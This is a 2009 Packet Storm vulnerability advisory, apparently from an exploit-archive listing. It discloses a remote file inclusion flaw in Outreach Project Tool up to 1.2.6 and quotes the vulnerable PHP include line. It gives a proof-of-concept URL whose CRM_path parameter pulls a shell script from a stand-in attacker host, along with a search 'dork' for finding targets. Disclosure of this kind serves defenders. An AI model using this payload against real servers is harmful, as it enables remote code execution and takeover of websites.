Outreach Project Tool 1.2.6 Remote File Inclusion

2009-11-23T00:00:00
ID PACKETSTORM:82867
Type packetstorm
Reporter cr4wl3r
Modified 2009-11-23T00:00:00

Description

                                        
                                            ` [ Discovered by cr4wl3r \ Indonesian Hacker ]  
  
########################################################################  
# OPT (Outreach Project Tool) <= 1.2.6 [CRM_path] Remote File Include Vulnerability  
# Download Script : http://sourceforge.net/projects/outreach  
# Dork : "Adhan Handsome" :D  
########################################################################  
#  
# Vuln : ./OPT_1-2-7_MAX/opt/forums/Forum_Include/index.php (line 10)  
# <?php  
# include "$CRM_path/forums/Forum_Include/forum_admin.inc";  
# ?>  
# PoC : http://[target]/[path]/forums/Forum_Include/index.php?CRM_path=http://[attacker]/shell.txt???  
#  
#  
#  
########################################################################  
# Thx 2 : str0ke, opt!x hacker, xoron, irvian, cyberlog, basix,  
# dan seluruh orang yang membenciku dan menyayangiku [I Love U Full] :*  
########################################################################  
  
/##############################################\  
# all member at sekuritionline.net #  
# all member at manadocoding.net #  
\##############################################/  
  
# Contact Me : cr4wl3r[4t]linuxmail[dot]org  
  
[ Gorontalo / 2009 ]   
  
  
  
`